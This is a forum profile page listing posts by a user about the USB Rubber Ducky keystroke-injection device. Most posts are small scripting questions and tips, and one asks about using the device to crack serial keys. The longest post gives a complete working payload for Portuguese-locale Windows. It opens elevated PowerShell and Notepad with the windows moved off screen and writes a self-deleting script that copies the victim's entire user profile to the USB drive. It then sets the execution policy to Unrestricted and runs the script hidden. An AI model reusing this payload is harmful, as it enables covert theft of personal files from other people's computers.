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Everything posted by LukasS

  1. http://www.dave-reed.com/Nifty/randSeq.html Is it possible to use the site Maybe?
  2. Change Firmware to twin duck and then do this .. :
  3. Thanks for that quick answer... Maybe it's impossible to use rubber to do what I want to do... I would like to Crack contest and serial keys of programs... Something like that... The rubber type the data and press enter...
  4. Is it possible to create a script to generate random characters on rubber ducky ?
  5. It was that button that i was talking about ... i was mindblowing when they said that was copying with right button xD
  6. Just one point ... you need to clear the text on GUI + R after the job done ... how will you make it ?
  7. how is doing that ??? there is an option on github to download all to a zip... wth ???
  8. Well done :) It works ... You should do more resources like this ... thank you :D
  9. Yes you can do it by batch ... putt the ducky to run a batch and create a menu using batch language ... here is an example : ECHO OFF CLS :MENU ECHO. ECHO ............................................... ECHO PRESS 1, 2 OR 3 to select your task, or 4 to EXIT. ECHO ............................................... ECHO. ECHO 1 - Open Notepad ECHO 2 - Open Calculator ECHO 3 - Open Notepad AND Calculator ECHO 4 - EXIT ECHO. SET /P M=Type 1, 2, 3, or 4 then press ENTER: IF %M%==1 GOTO NOTE IF %M%==2 GOTO CALC IF %M%==3 GOTO BOTH IF %M%==4 GOTO EOF :NOTE cd %windir%\system32\notepad.exe start notepad.exe GOTO MENU :CALC cd %windir%\system32\calc.exe start calc.exe GOTO MENU :BOTH cd %windir%\system32\notepad.exe start notepad.exe cd %windir%\system32\calc.exe start calc.exe GOTO MENU
  10. Hy :D Try this and adapt to your script :D STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
  11. Hy everybody .... as you all know that script and others too doesn't work on other Windows ... why ? because the script is generated for Windows for the Us ... I will explain [have a coffe and cookies ] ... well i'm from portugal and Notepad here works different for the notepad from united states ... for example ... Your's CTRL + S here doesn't work ... for us is CTRL + G ( G=GUARDAR=SAVE :D) soo all the scripts doesn't work for us ... but there is a way to make works things out :) here is the fix for copy users home directory to usb ( with twin duck ) DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1000 LEFTARROW DELAY 500 ENTER DELAY 2000 ALT SPACE DELAY 500 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\' ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name ENTER STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER STRING copy-item $userDir $usbPath.Name -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER DELAY 500 ALT F4 LEFTARROW LEFTARROW LEFTARROW ENTER DELAY 1500 STRING C:\Windows\config-a7243.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 LEFTARROW DELAY 1000 ENTER DELAY 500 STRING mode con:cols=14 lines=1 ENTER DELAY 500 ALT SPACE DELAY 1000 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 2000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config-a7243.ps1 ENTER it needs some downarrow to hide for complete but you can add laters ... all you have to do is look at the source code and change from CTRL + S too ALT + F4 because this will try to close notepad then you leftarrow leftarrow and will click SAVE or Guardar and then the script will work ... i have delay very mutch to see everythings is working you can edit that too for fast usage ... I will help more this community and will work on scripts for that the scripts will go universal ;) thank you all
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